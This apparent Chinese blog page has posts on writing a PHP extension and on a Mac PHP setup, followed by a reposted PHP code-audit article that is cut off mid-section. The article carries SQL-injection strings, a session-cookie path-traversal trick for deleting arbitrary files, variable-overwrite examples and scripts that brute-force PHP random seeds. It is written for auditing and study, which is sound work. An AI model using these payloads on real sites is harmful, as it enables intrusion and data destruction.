花太香齐的博客 » PHP/WEB

linux下php扩展(php ext)开发记录

花太香齐 — Tue, 04 May 2010 04:57:56 +0000

公司需要对通行证用户资料的教检函数封包(防止服务器沦陷,用户资料被解密)，需要开发一个扩展函数，
username是cookie中的username，
hashkey 是 cookie中的 PName
开发php ext: 函数名为csdn_verify_auth，参数是username 和 hashkey ，（算法机密文件略）

第一次写PHP扩展，搜索资料到编写测试用了一天半完成，记录一下吧，以后如果需要做的话大部分时间只能浪费在C算法上。

1.先down一个php下来,编译安装：(编译环境只做测试扩展用)
wget http://cn2.php.net/get/php-5.2.13.tar.gz/from/cn.php.net/mirror tar zxvf php-5.2.13.tar.gz cd php-5.2.13 ./configure --prefix=/csdn_verify_auth/php --with-config-file-path=/csdn_verify_auth/php/etc make ZEND_EXTRA_LIBS='-liconv' make install cp php.ini-dist /csdn_verify_auth/php/etc/php.ini

2.修改一下vi /csdn_verify_auth/php/etc/php.ini中的extension_dir = “./”
　　修改为extension_dir = "/csdn_verify_auth/php/lib/php/extensions/no-debug-non-zts-20060613"
　　并在此行后增加以下，然后保存：
　　extension = "csdn_verify_auth.so"
csdn_verify_auth改为你开发的扩展的名字

3.开始创建扩展项目
进入源码目录
cd /csdn_verify_auth/php-5.2.13/ext/ ./ext_skel --extname=csdn_verify_auth

创建名字为csdn_verify_auth的项目，最终会生成csdn_verify_auth.so

4.更改配置和扩展程序开发
vi ext/csdn_verify_auth/config.m4

根据你自己的选择将

dnl PHP_ARG_WITH(csdn_verify_auth, for csdn_verify_auth support,
dnl Make sure that the comment is aligned:
dnl [ --with-csdn_verify_auth Include csdn_verify_auth support])

去掉dnl
或者将

dnl PHP_ARG_ENABLE(csdn_verify_auth, whether to enable csdn_verify_auth support,
dnl Make sure that the comment is aligned:
dnl [ --enable-csdn_verify_auth Enable csdn_verify_auth support])

去掉dnl

vi ext/csdn_verify_auth/php_csdn_verify_auth.h
将
PHP_FUNCTION(confirm_csdn_verify_auth_compiled); /* For testing, remove later. */
更改为
PHP_FUNCTION(csdn_verify_auth);

vi ext/csdn_verify_auth/csdn_verify_auth.c
将
zend_function_entry php5cpp_functions[] = { PHP_FE(confirm_csdn_verify_auth_compiled, NULL) /* For testing, remove later. */ {NULL, NULL, NULL} /* Must be the last line in php5cpp_functions[] */ };
更改为
zend_function_entry php5cpp_functions[] = { PHP_FE(csdn_verify_auth, NULL) {NULL, NULL, NULL} /* Must be the last line in php5cpp_functions[] */ };
在最后添加：
PHP_FUNCTION(csdn_verify_auth) { zend_printf("hello world\n"); }

5.编译生成so文件
cd /csdn_verify_auth/php-5.2.13/ext/csdn_verify_auth/ /csdn_verify_auth/php/bin/phpize ./configure --with-php-config=/csdn_verify_auth/php/bin/php-config make mv /csdn_verify_auth/php-5.2.13/ext/csdn_verify_auth/modules/csdn_verify_auth.so /csdn_verify_auth/php/lib/php/extensions/no-debug-non-zts-20060613 cd ../../../

6.测试扩展
vi /csdn_verify_auth/hello.php

csdn_verify_auth();
?>

/csdn_verify_auth/php/bin/php hello.php
hello world.

主要用到的api就那么几个：
ZEND_NUM_ARGS()、zend_parse_parameters(args TSRMLS_CC, “ss”, &username, &username_length, &hash, &hash_length) 参数接收系列
RETURN_FALSE。。RETURN_STRINGL(s, l, dup)等返回系列函数
…………………
其他的基本就是C了，再次感叹下，学好C语言，走到哪都不怕。

————————-END——————————

Mac OS X 10.6 Snow Leopard构建Apache，MySQL，PHP开发环境全记录

花太香齐 — Sun, 07 Mar 2010 07:43:17 +0000

操作环境 :

系统: Mac OS X 10.6.2 （Snow Leopard）
环境软件:
Apache 2.2.11 系统内置
PHP 5.3.0 系统内置
MySQL 5.1.43 dmg安装包
推荐几个开发软件:
Xcode 苹果官方免费软件
zend studio zend公司有dmg安装包
coda 也支持php函数提醒功能,很好用,apple软件库有

由于mac是基于unix内核的,很多开发开源软件都自带了,如:apache|php|java|python等,而且自带shell命令终端,在此咕噜一下,做开发或设计的赶快转到mac平台吧,当然asp,c#就别来了,嘎嘎.这些自带的基本都相当新,不习惯的可以自己终端编译.

如果想用套件的话,这里也推荐几个:MAMP, XAMPP or Marc Liyanage.自己google一下.下面就可以路过了.

配置apache:
1.让apache加载php模块,自己指定localhost跟目录等.打开终端:
su root vi /etc/apache2/httpd.conf

找到:#LoadModule php5_module libexec/apache2/libphp5.so去掉全面的#
找到: DocumentRoot “/Users/ieliwb/Sites” 修改目录,记得有2处
2.开启apache
你可以在系统偏好设置里->共享->web共享勾上
或终端敲入:
su root apachectl start
记住所有apache配置操作都是root用户才能修改的.所以记得su root.

配置php:

不同人不同应用程序对PHP的设置要求也不同，这里仅仅粗略描述最基本的几项设置，且只说明目标，具体操作则省略掉了，其它设置条目参考其它文档。在每次对PHP配置文件php.ini文件做出更改后，要重新启动一次Apache服务才能使更改生效。

1. php.ini

默认地，Mac OS X 10.6没有php.ini配置文件，需要自己创建。也可以使用/private/etc/php.ini.default文件改写另存为/private/etc/php.ini文件。
2. timezone，时区设置

Mac OS X 10.6自带了PHP 5.3.0，同时也带来了一点新要求：“强制”要求定义时区。搜索“date.timezone”（第997行），然后设定正确的时区ID，比如澳大利亚悉尼，时区ID就是Australia/Sydney。注意，时区ID没有引号。所有时区ID可以在http://php.net/manual/en/timezones.php上找到。
3. mysql.sock

在php.ini文件中搜索“mysql.sock”字串，把找到的三个配置条目稍稍做一下修改：

…
pdo_mysql.default_socket=/tmp/mysql.sock
…
mysql.default_socket = /tmp/mysql.sock
…
mysqli.default_socket = /tmp/mysql.sock
…

在Mac OS X 10.5 leopard中，mysql.sock文件被放在了/var/mysql/mysql.sock，而Mac OS X 10.6 Snow Leopard中的mysql.sock文件位置/tmp/mysql.sock就标准多了。最后对php.ini文件做你所需要的更改，保存。

mysql安装调试:

我这里选择dmg安装的,你也可以选择源码自己编译,去mysql官方下载dmg包,一路点下去就可以,完成后在系统编好设置里有个开关来启动和停用mysql.你也可以在终端输入命令来启动.基本操作和linux下大部分完全一样的.
/usr/local/mysql/bin/mysql

开发工具推荐还是用官方zendstudio吧.有dmg包.

到此就完了,是不是很简单呢.如果想自己编译的话可以参考:

http://www.procata.com/blog/archives/2007/10/28/working-with-php-5-in-mac-os-x-105/

http://www.dongyl.com/knowledge-base/2-macintosh/23-how-to-setup-mamp-under-mac-os-x-106-snow-leopard.html

[转]高级PHP应用程序漏洞审核技术

花太香齐 — Tue, 29 Dec 2009 10:30:28 +0000

[目录]

1. 前言
2. 传统的代码审计技术
3. PHP版本与应用代码审计
4. 其他的因素与应用代码审计
5. 扩展我们的字典
5.1 变量本身的key
5.2 变量覆盖
   5.2.1 遍历初始化变量
   5.2.2 parse_str()变量覆盖漏洞
   5.2.3 import_request_variables()变量覆盖漏洞
   5.2.4 PHP5 Globals
5.3 magic_quotes_gpc与代码安全
   5.3.1 什么是magic_quotes_gpc
   5.3.2 哪些地方没有魔术引号的保护
   5.3.3 变量的编码与解码
   5.3.4 二次攻击
   5.3.5 魔术引号带来的新的安全问题
   5.3.6 变量key与魔术引号
5.4 代码注射
   5.4.1 PHP中可能导致代码注射的函数
   5.4.2 变量函数与双引号
5.5 PHP自身函数漏洞及缺陷
   5.5.1 PHP函数的溢出漏洞
   5.5.2 PHP函数的其他漏洞
   5.5.3 session_destroy()删除文件漏洞
   5.5.4 随机函数
5.6 特殊字符
   5.6.1 截断
   5.6.1.1 include截断
   5.6.1.2 数据截断
   5.6.1.3 文件操作里的特殊字符
6. 怎么进一步寻找新的字典
7. DEMO
8. 后话
9. 附录

一、前言

   PHP是一种被广泛使用的脚本语言，尤其适合于web开发。具有跨平台，容易学习，功能强
大等特点，据统计全世界有超过34%的网站有php的应用，包括Yahoo、sina、163、sohu等大型
门户网站。而且很多具名的web应用系统（包括bbs,blog,wiki,cms等等）都是使用php开发的，
Discuz、phpwind、phpbb、vbb、wordpress、boblog等等。随着web安全的热点升级，php应
用程序的代码安全问题也逐步兴盛起来，越来越多的安全人员投入到这个领域，越来越多的应
用程序代码漏洞被披露。针对这样一个状况，很多应用程序的官方都成立了安全部门，或者雇
佣安全人员进行代码审计，因此出现了很多自动化商业化的代码审计工具。也就是这样的形
势导致了一个局面：大公司的产品安全系数大大的提高，那些很明显的漏洞基本灭绝了，那些
大家都知道的审计技术都无用武之地了。我们面对很多工具以及大牛扫描过n遍的代码，有很
多的安全人员有点悲观，而有的官方安全人员也非常的放心自己的代码，但是不要忘记了“没
有绝对的安全”，我们应该去寻找新的途径挖掘新的漏洞。本文就给介绍了一些非传统的技术
经验和大家分享。

   另外在这里特别说明一下本文里面很多漏洞都是来源于网络上牛人和朋友们的分享，在
这里需要感谢他们，：）

二、传统的代码审计技术

   WEB应用程序漏洞查找基本上是围绕两个元素展开：变量与函数。也就是说一漏洞的利用
必须把你提交的恶意代码通过变量经过n次变量转换传递，最终传递给目标函数执行，还记得
MS那句经典的名言吗？“一切输入都是有害的”。这句话只强调了变量输入，很多程序员把“输
入”理解为只是gpc[$_GET,$_POST,$_COOKIE]，但是变量在传递过程产生了n多的变化。导致
很多过滤只是个“纸老虎”！我们换句话来描叙下代码安全：“一切进入函数的变量是有害的”。

   PHP代码审计技术用的最多也是目前的主力方法：静态分析，主要也是通过查找容易导致
安全漏洞的危险函数，常用的如grep，findstr等搜索工具，很多自动化工具也是使用正则来搜
索这些函数。下面列举一些常用的函数，也就是下文说的字典（暂略）。但是目前基本已有的
字典很难找到漏洞，所以我们需要扩展我们的字典，这些字典也是本文主要探讨的。

   其他的方法有：通过修改PHP源代码来分析变量流程，或者hook危险的函数来实现对应用
程序代码的审核，但是这些也依靠了我们上面提到的字典。

三、PHP版本与应用代码审计

   到目前为止，PHP主要有3个版本：php4、php5、php6，使用比例大致如下：

php4 68%
2000-2007，No security fixes after 2008/08，最终版本是php4.4.9

php5 32%
2004-present，Now at version 5.2.6（PHP 5.3 alpha1 released!）

php6
目前还在测试阶段，变化很多做了大量的修改，取消了很多安全选项如magic_quotes_gpc。
（这个不是今天讨论的范围）

   由于php缺少自动升级的机制，导致目前PHP版本并存，也导致很多存在漏洞没有被修补。
这些有漏洞的函数也是我们进行WEB应用程序代码审计的重点对象，也是我们字典重要来源。

四、其他的因素与应用代码审计

   很多代码审计者拿到代码就看，他们忽视了“安全是一个整体”，代码安全很多的其他因素
有关系，比如上面我们谈到的PHP版本的问题，比较重要的还有操作系统类型（主要是两大阵营
win/*nix），WEB服务端软件（主要是iis/apache两大类型）等因素。这是由于不同的系统不同
的WEB SERVER有着不同的安全特点或特性，下文有些部分会涉及。

   所以我们在做某个公司WEB应用代码审计时，应该了解他们使用的系统，WEB服务端软件，
PHP版本等信息。

五、扩展我们的字典

下面将详细介绍一些非传统PHP应用代码审计一些漏洞类型和利用技巧。

5.1 变量本身的key

   说到变量的提交很多人只是看到了GET/POST/COOKIE等提交的变量的值，但是忘记了有的
程序把变量本身的key也当变量提取给函数处理。

--code-------------------------------------------------------------------------

//key.php?aaaa"aaa=1&bb"b=2
//print_R($_GET);
foreach ($_GET AS $key => $value)
{
   print $key."\n";
}
?>
-------------------------------------------------------------------------------

   上面的代码就提取了变量本身的key显示出来，单纯对于上面的代码，如果我们提交URL：

--code-------------------------------------------------------------------------
key.php?=1&bbb=2
-------------------------------------------------------------------------------

   那么就导致一个xss的漏洞，扩展一下如果这个key提交给include()等函数或者sql查询
呢？：）

+++++++++++++++++++++++++
漏洞审计策略
-------------------------
PHP版本要求：无
系统要求：无
审计策略：通读代码
+++++++++++++++++++++++++

5.2 变量覆盖（variable-overwrite）

   很多的漏洞查找者都知道extract()这个函数在指定参数为EXTR_OVERWRITE或者没有指
定函数可以导致变量覆盖，但是还有很多其他情况导致变量覆盖的如：

5.2.1 遍历初始化变量

请看如下代码：

--code-------------------------------------------------------------------------

//var.php?a=fuck
$a="hi";
foreach($_GET as $key => $value) {
   $$key = $value;
}
print $a;
?>
-------------------------------------------------------------------------------

   很多的WEB应用都使用上面的方式（注意循环不一定是foreach），如Discuz!4.1的WAP部分
的代码：

--code-------------------------------------------------------------------------
$chs = "";
if($_POST && $charset != "utf-8") {
   $chs = new Chinese("UTF-8", $charset);
   foreach($_POST as $key => $value) {
   $$key = $chs->Convert($value);
   }
   unset($chs);
-------------------------------------------------------------------------------

+++++++++++++++++++++++++
漏洞审计策略
-------------------------
PHP版本要求：无
系统要求：无
审计策略：通读代码
+++++++++++++++++++++++++

5.2.2 parse_str()变量覆盖漏洞（CVE-2007-3205）、mb_parse_str()

--code-------------------------------------------------------------------------
//var.php?var=new
$var = "init";
parse_str($_SERVER["QUERY_STRING"]);
print $var;
-------------------------------------------------------------------------------

   该函数一样可以覆盖数组变量，上面的代码是通过$_SERVER["QUERY_STRING"]来提取变
量的，对于指定了变量名的我们可以通过注射“=”来实现覆盖其他的变量：

--code-------------------------------------------------------------------------
//var.php?var=1&a[1]=var1%3d222
$var1 = "init";
parse_str($a[$_GET["var"]]);
print $var1;
-------------------------------------------------------------------------------

上面的代码通过提交$var来实现对$var1的覆盖。

+++++++++++++++++++++++++
漏洞审计策略（parse_str）
-------------------------
PHP版本要求：无
系统要求：无
审计策略：查找字符parse_str
+++++++++++++++++++++++++

+++++++++++++++++++++++++
漏洞审计策略（mb_parse_str）
-------------------------
PHP版本要求：php4<4.4.7 php5<5.2.2
系统要求：无
审计策略：查找字符mb_parse_str
+++++++++++++++++++++++++

5.2.3 import_request_variables()变量覆盖漏洞（CVE-2007-1396）

--code-------------------------------------------------------------------------
//var.php?_SERVER[REMOTE_ADDR]=10.1.1.1
echo "GLOBALS ".(int)ini_get("register_globals")."n";
import_request_variables("GPC");
if ($_SERVER["REMOTE_ADDR"] != "10.1.1.1") die("Go away!");
echo "Hello admin!";
-------------------------------------------------------------------------------

+++++++++++++++++++++++++
漏洞审计策略（import_request_variables）
-------------------------
PHP版本要求：php4<4.4.1 php5<5.2.2
系统要求：无
审计策略：查找字符import_request_variables
+++++++++++++++++++++++++

5.2.4 PHP5 Globals

   从严格意义上来说这个不可以算是PHP的漏洞，只能算是一个特性，测试代码：

--code-------------------------------------------------------------------------

// register_globals =ON
//foo.php?GLOBALS[foobar]=HELLO
php echo $foobar;
?>
-------------------------------------------------------------------------------

   但是很多的程序没有考虑到这点，请看如下代码：

--code-------------------------------------------------------------------------
//为了安全取消全局变量
//var.php?GLOBALS[a]=aaaa&b=111
if (ini_get("register_globals")) foreach($_REQUEST as $k=>$v) unset(${$k});
print $a;
print $_GET[b];
-------------------------------------------------------------------------------

   如果熟悉WEB2.0的攻击的同学，很容易想到上面的代码我们可以利用这个特性进行crsf
攻击。

+++++++++++++++++++++++++
漏洞审计策略
-------------------------
PHP版本要求：无
系统要求：无
审计策略：通读代码
+++++++++++++++++++++++++

5.3 magic_quotes_gpc与代码安全

5.3.1 什么是magic_quotes_gpc

   当打开时，所有的 "（单引号），"（双引号），\（反斜线）和 NULL 字符都会被自动加上一个
反斜线进行转义。还有很多函数有类似的作用如：addslashes()、mysql_escape_string()、
mysql_real_escape_string()等，另外还有parse_str()后的变量也受magic_quotes_gpc的影
响。目前大多数的主机都打开了这个选项，并且很多程序员也注意使用上面那些函数去过滤
变量，这看上去很安全。很多漏洞查找者或者工具遇到些函数过滤后的变量直接就放弃，但是
就在他们放弃的同时也放过很多致命的安全漏洞。：）

5.3.2 哪些地方没有魔术引号的保护

1) $_SERVER变量

   PHP5的$_SERVER变量缺少magic_quotes_gpc的保护，导致近年来X-Forwarded-For的漏洞
猛暴，所以很多程序员考虑过滤X-Forwarded-For，但是其他的变量呢？

+++++++++++++++++++++++++
漏洞审计策略（$_SERVER变量）
-------------------------
PHP版本要求：无
系统要求：无
审计策略：查找字符_SERVER
+++++++++++++++++++++++++

2) getenv()得到的变量（使用类似$_SERVER变量）

+++++++++++++++++++++++++
漏洞审计策略（getenv()）
-------------------------
PHP版本要求：无
系统要求：无
审计策略：查找字符getenv
+++++++++++++++++++++++++

3) $HTTP_RAW_POST_DATA与PHP输入、输出流

   主要应用与soap/xmlrpc/webpublish功能里，请看如下代码：

--code-------------------------------------------------------------------------
if ( !isset( $HTTP_RAW_POST_DATA ) ) {
   $HTTP_RAW_POST_DATA = file_get_contents( "php://input" );
}
if ( isset($HTTP_RAW_POST_DATA) )
   $HTTP_RAW_POST_DATA = trim($HTTP_RAW_POST_DATA);
-------------------------------------------------------------------------------

+++++++++++++++++++++++++
漏洞审计策略（数据流）
-------------------------
PHP版本要求：无
系统要求：无
审计策略：查找字符HTTP_RAW_POST_DATA或者php://input
+++++++++++++++++++++++++

4) 数据库操作容易忘记"的地方如：in()/limit/order by/group by

   如Discuz!<5.0的pm.php：

--code-------------------------------------------------------------------------
if(is_array($msgtobuddys)) {
   $msgto = array_merge($msgtobuddys, array($msgtoid));
   ......
foreach($msgto as $uid) {
   $uids .= $comma.$uid;
   $comma = ",";
}
......
$query = $db->query("SELECT m.username, mf.ignorepm FROM {$tablepre}members m
   LEFT JOIN {$tablepre}memberfields mf USING(uid)
   WHERE m.uid IN ($uids)");
-------------------------------------------------------------------------------

+++++++++++++++++++++++++
漏洞审计策略
-------------------------
PHP版本要求：无
系统要求：无
审计策略：查找数据库操作字符（select,update,insert等等）
+++++++++++++++++++++++++

5.3.3 变量的编码与解码

   一个WEB程序很多功能的实现都需要变量的编码解码，而且就在这一转一解的传递过程中
就悄悄的绕过你的过滤的安全防线。

   这个类型的主要函数有：

1) stripslashes() 这个其实就是一个decode-addslashes()

2) 其他字符串转换函数：

base64_decode -- 对使用 MIME base64 编码的数据进行解码
base64_encode -- 使用 MIME base64 对数据进行编码
rawurldecode -- 对已编码的 URL 字符串进行解码
rawurlencode -- 按照 RFC 1738 对 URL 进行编码
urldecode -- 解码已编码的 URL 字符串
urlencode -- 编码 URL 字符串
......
（另外一个 unserialize/serialize）

3) 字符集函数（GKB,UTF7/8...）如iconv()/mb_convert_encoding()等

   目前很多漏洞挖掘者开始注意这一类型的漏洞了，如典型的urldecode：

--code-------------------------------------------------------------------------
$sql = "SELECT * FROM article WHERE articleid="".urldecode($_GET[id]).""";
-------------------------------------------------------------------------------

   当magic_quotes_gpc=on时，我们提交?id=%2527，得到sql语句为：

--code-------------------------------------------------------------------------
SELECT * FROM article WHERE articleid="""
-------------------------------------------------------------------------------

+++++++++++++++++++++++++
漏洞审计策略
-------------------------
PHP版本要求：无
系统要求：无
审计策略：查找对应的编码函数
+++++++++++++++++++++++++

5.3.4 二次攻击（详细见附录[1]）

1) 数据库出来的变量没有进行过滤

2) 数据库的转义符号：

* mysql/oracle转义符号同样是\（我们提交"通过魔术引号变化为\"，当我们update进入数
据库时，通过转义变为"）

* mssql的转义字符为"（所以我们提交"通过魔术引号变化为\"，mssql会把它当为一个字符
串直接处理，所以魔术引号对于mssql的注射没有任何意义）

   从这里我们可以思考得到一个结论：一切进入函数的变量都是有害的，另外利用二次攻击
我们可以实现一个webrootkit，把我们的恶意构造直接放到数据库里。我们应当把这样的代
码看成一个vul？

+++++++++++++++++++++++++
漏洞审计策略
-------------------------
PHP版本要求：无
系统要求：无
审计策略：通读代码
+++++++++++++++++++++++++

5.3.5 魔术引号带来的新的安全问题

   首先我们看下魔术引号的处理机制：

[\-->\\,"-->\","-->\",null-->\0]

   这给我们引进了一个非常有用的符号“\”，“\”符号不仅仅是转义符号，在WIN系统下也是
目录转跳的符号。这个特点可能导致php应用程序里产生非常有意思的漏洞：

1) 得到原字符（",\,",null]）

--code-------------------------------------------------------------------------
$order_sn=substr($_GET["order_sn"], 1);

//提交 "
//魔术引号处理 \"
//substr "

$sql = "SELECT order_id, order_status, shipping_status, pay_status, ".
   " shipping_time, shipping_id, invoice_no, user_id ".
   " FROM " . $ecs->table("order_info").
   " WHERE order_sn = "$order_sn" LIMIT 1";
-------------------------------------------------------------------------------

2) 得到“\”字符

--code-------------------------------------------------------------------------
$order_sn=substr($_GET["order_sn"], 0,1);

//提交 "
//魔术引号处理 \"
//substr \

$sql = "SELECT order_id, order_status, shipping_status, pay_status, ".
   " shipping_time, shipping_id, invoice_no, user_id ".
   " FROM " . $ecs->table("order_info").
   " WHERE order_sn = "$order_sn" and order_tn="".$_GET["order_tn"].""";
-------------------------------------------------------------------------------

   提交内容：

--code-------------------------------------------------------------------------
?order_sn="&order_tn=%20and%201=1/*
-------------------------------------------------------------------------------

   执行的SQL语句为：

--code-------------------------------------------------------------------------
SELECT order_id, order_status, shipping_status, pay_status, shipping_time,
shipping_id, invoice_no, user_id FROM order_info WHERE order_sn = "\" and
order_tn=" and 1=1/*"
-------------------------------------------------------------------------------

+++++++++++++++++++++++++
漏洞审计策略
-------------------------
PHP版本要求：无
系统要求：无
审计策略：查找字符串处理函数如substr或者通读代码
+++++++++++++++++++++++++

5.3.6 变量key与魔术引号

   我们最在这一节的开头就提到了变量key，PHP的魔术引号对它有什么影响呢？

--code-------------------------------------------------------------------------

//key.php?aaaa"aaa=1&bb"b=2
//print_R($_GET);
foreach ($_GET AS $key => $value)
   {
   print $key."\n";
   }
?>
-------------------------------------------------------------------------------

1) 当magic_quotes_gpc = On时，在php5.24下测试显示：

aaaa\"aaa
bb\"b

   从上面结果可以看出来，在设置了magic_quotes_gpc = On下，变量key受魔术引号影响。
但是在php4和php<5.2.1的版本中，不处理数组第一维变量的key，测试代码如下：

--code-------------------------------------------------------------------------

//key.php?aaaa"aaa[bb"]=1
print_R($_GET);
?>
-------------------------------------------------------------------------------

   结果显示:

Array ( [aaaa"aaa] => Array ( [bb\"] => 1 ) )

   数组第一维变量的key不受魔术引号的影响。

+++++++++++++++++++++++++
漏洞审计策略
-------------------------
PHP版本要求：php4和php<5.2.1
系统要求：无
审计策略：通读代码
+++++++++++++++++++++++++

2) 当magic_quotes_gpc = Off时，在php5.24下测试显示：

aaaa"aaa
bb"b

   对于magic_quotes_gpc = Off时所有的变量都是不安全的，考虑到这个，很多程序都通过
addslashes等函数来实现魔术引号对变量的过滤，示例代码如下：

--code-------------------------------------------------------------------------

//keyvul.php?aaa"aa=1"
//magic_quotes_gpc = Off
if (!get_magic_quotes_gpc())
{
$_GET = addslashes_array($_GET);
}

function addslashes_array($value)
{
   return is_array($value) ? array_map("addslashes_array", $value) : addslashes($value);
}
print_R($_GET);
foreach ($_GET AS $key => $value)
{
   print $key;
}
?>
-------------------------------------------------------------------------------

   以上的代码看上去很完美，但是他这个代码里addslashes($value)只处理了变量的具体
的值，但是没有处理变量本身的key，上面的代码显示结果如下：

Array
(
   [aaa"aa] => 1\"
)
aaa"aa

+++++++++++++++++++++++++
漏洞审计策略
-------------------------
PHP版本要求：无
系统要求：无
审计策略：通读代码
+++++++++++++++++++++++++

5.4 代码注射

5.4.1 PHP中可能导致代码注射的函数

   很多人都知道eval、preg_replace+/e可以执行代码，但是不知道php还有很多的函数可
以执行代码如：

assert()
call_user_func()
call_user_func_array()
create_function()
变量函数
...

   这里我们看看最近出现的几个关于create_function()代码执行漏洞的代码：

--code-------------------------------------------------------------------------

//how to exp this code
$sort_by=$_GET["sort_by"];
$sorter="strnatcasecmp";
$databases=array("test","test");
$sort_function = " return 1 * " . $sorter . "($a["" . $sort_by . ""], $b["" . $sort_by . ""]);
   ";
usort($databases, create_function("$a, $b", $sort_function));
-------------------------------------------------------------------------------

+++++++++++++++++++++++++
漏洞审计策略
-------------------------
PHP��本要求：无
系统要求：无
审计策略：查找对应函数（assert,call_user_func,call_user_func_array,create_function��）
+++++++++++++++++++++++++

5.4.2 变量函数与双引号

   对于单引号和双引号的区别，很多程序员深有体会，示例代码：

--code-------------------------------------------------------------------------
echo "$a\n";
echo "$a\n";
-------------------------------------------------------------------------------

   我们再看如下代码：

--code-------------------------------------------------------------------------
//how to exp this code
if($globals["bbc_email"]){

$text = preg_replace(
   array("/\[email=(.*?)\](.*?)\[\/email\]/ies",
   "/\[email\](.*?)\[\/email\]/ies"),
   array("check_email("$1", "$2")",
   "check_email("$1", "$1")"), $text);
-------------------------------------------------------------------------------

   另外很多的应用程序都把变量用""存放在缓存文件或者config��者data��件里，这样很
容易被人注射变量函数。

+++++++++++++++++++++++++
漏洞审计策略
-------------------------
PHP��本要求：无
系统要求：无
审计策略：通读代码
+++++++++++++++++++++++++

5.5 PHP��身函数漏洞及缺陷

5.5.1 PHP��数的溢出漏洞

   大家还记得Stefan Esser��牛的Month of PHP Bugs��MOPB��附录[2]）项目么，其中比较
有名的要算是unserialize()，代码如下：

--code-------------------------------------------------------------------------
unserialize(stripslashes($HTTP_COOKIE_VARS[$cookiename . "_data"]);
-------------------------------------------------------------------------------

   在以往的PHP��本里，很多函数都曾经出现过溢出漏洞，所以我们在审计应用程序漏洞的
时候不要忘记了测试目标使用的PHP��本信息。

+++++++++++++++++++++++++
漏洞审计策略
-------------------------
PHP��本要求：对应fix��版本
系统要求：
审计策略：查找对应函数名
+++++++++++++++++++++++++

5.5.2 PHP��数的其他漏洞

   Stefan Esser��牛发现的漏洞：unset()--Zend_Hash_Del_Key_Or_Index Vulnerability

   比如phpwind��期的serarch.php��的代码：

--code-------------------------------------------------------------------------
unset($uids);
......
$query=$db->query("SELECT uid FROM pw_members WHERE username LIKE "$pwuser"");
while($member=$db->fetch_array($query)){
   $uids .= $member["uid"].",";
}
$uids ? $uids=substr($uids,0,-1) : $sqlwhere.=" AND 0 ";
........
$query = $db->query("SELECT DISTINCT t.tid FROM $sqltable WHERE $sqlwhere $orderby $limit");
-------------------------------------------------------------------------------

+++++++++++++++++++++++++
漏洞审计策略
-------------------------
PHP��本要求：php4<4.3 php5<5.14
系统要求：无
审计策略：查找unset
+++++++++++++++++++++++++

5.5.3 session_destroy()删除文件漏洞（测试PHP��本：5.1.2）

   这个漏洞是几年前朋友saiy��现的，session_destroy()函数的功能是删除session��件，
很多web��用程序的logout��功能都直接调用这个函数删除session��但是这个函数在一些老
的版本中缺少过滤导致可以删除任意文件。测试代码如下：

--code-------------------------------------------------------------------------
php
//val.php
session_save_path("./");
session_start();
if($_GET["del"]) {
   session_unset();
   session_destroy();
}else{
   $_SESSION["hei"]=1;
   echo(session_id());
   print_r($_SESSION);
}
?>
-------------------------------------------------------------------------------

   当我们提交构造cookie:PHPSESSID=/../1.php��相当于unlink("sess_/../1.php")这样
就通过注射../转跳目录删除任意文件了。很多著名的程序某些版本都受影响如phpmyadmin��
sablog��phpwind3��等。

+++++++++++++++++++++++++
漏洞审计策略
-------------------------
PHP��本要求：具体不详
系统要求：无
审计策略：查找session_destroy
+++++++++++++++++++++++++

5.5.4 随机函数

1) rand() VS mt_rand()

--code-------------------------------------------------------------------------
php
//on windows
print mt_getrandmax(); //2147483647
print getrandmax();// 32767
?>
-------------------------------------------------------------------------------

   可以看出rand()最大的随机数是32767，这个很容易被我们暴力破解。

--code-------------------------------------------------------------------------

$a= md5(rand());
for($i=0;$i<=32767;$i++){
if(md5($i) ==$a ) {
   print $i."-->ok!!
";exit;
   }else { print $i."
";}
}
?>
-------------------------------------------------------------------------------

   当我们的程序使用rand处理session时，攻击者很容易暴力破解出你的session，但是对于
mt_rand是很难单纯的暴力的。

+++++++++++++++++++++++++
漏洞审计策略
-------------------------
PHP版本要求：无
系统要求：无
审计策略：查找rand
+++++++++++++++++++++++++

2) mt_srand()/srand()-weak seeding（by Stefan Esser）

   看php手册里的描述：

-------------------------------------------------------------------------------
mt_srand
(PHP 3 >= 3.0.6, PHP 4, PHP 5)

mt_srand -- 播下一个更好的随机数发生器种子
说明
void mt_srand ( int seed )

用 seed 来给随机数发生器播种。从 PHP 4.2.0 版开始，seed 参数变为可选项，当该项为空
时，会被设为随时数。

例子 1. mt_srand() 范例

// seed with microseconds
function make_seed()
{
   list($usec, $sec) = explode(" ", microtime());
   return (float) $sec + ((float) $usec * 100000);
}
mt_srand(make_seed());
$randval = mt_rand();
?>

注: 自 PHP 4.2.0 起，不再需要用 srand() 或 mt_srand() 函数给随机数发生器播种，现已
自动完成。
-------------------------------------------------------------------------------

   php从4.2.0开始实现了自动播种，但是为了兼容，后来使用类似于这样的代码播种：

--code-------------------------------------------------------------------------
mt_srand ((double) microtime() * 1000000)
-------------------------------------------------------------------------------

   但是使用(double)microtime()*1000000类似的代码seed是比较脆弱的：

0<(double) microtime()<1 ---> 0<(double) microtime()* 1000000<1000000

   那么很容易暴力破解,测试代码如下：

--code-------------------------------------------------------------------------

/////////////////
//>php rand.php
//828682
//828682
////////////////
ini_set("max_execution_time",0);
$time=(double) microtime()* 1000000;
print $time."\n";
mt_srand ($time);

$search_id = mt_rand();
$seed = search_seed($search_id);
print $seed;
function search_seed($rand_num) {
$max = 1000000;
for($seed=0;$seed<=$max;$seed++){
   mt_srand($seed);
   $key = mt_rand();
   if($key==$rand_num) return $seed;
}
return false;
}
?>
-------------------------------------------------------------------------------

   从上面的代码实现了对seed的破解，另外根据Stefan Esser的分析seed还根据进程变化
而变化，换句话来说同一个进程里的seed是相同的。然后同一个seed每次mt_rand的值都是
特定的。如下图：

+--------------+
| seed-A |
+--------------+
| mt_rand-A-1 |
| mt_rand-A-2 |
| mt_rand-A-3 |
+--------------+

+--------------+
| seed-B |
+--------------+
| mt_rand-B-1 |
| mt_rand-B-2 |
| mt_rand-B-3 |
+--------------+

   对于seed-A里mt_rand-1/2/3都是不相等的，但是值都是特定的，也就是说当seed-A等于
seed-B，那么mt_rand-A-1就等于mt_rand-B-1…，这样我们只要能够得到seed就可以得到每次
mt_rand的值了。

   对于5.2.6>php>4.2.0直接使用默认播种的程序也是不安全的（很多的安全人员错误的以
为这样就是安全的），这个要分两种情况来分析：

第一种："Cross Application Attacks"，这个思路在Stefan Esser文章里有提到，主要是利用
其他程序定义的播种（如mt_srand ((double) microtime()* 1000000)），phpbb+wordpree组
合就存在这样的危险.

第二种：5.2.6>php>4.2.0默认播种的算法也不是很强悍，这是Stefan Esser的文章里的描述：

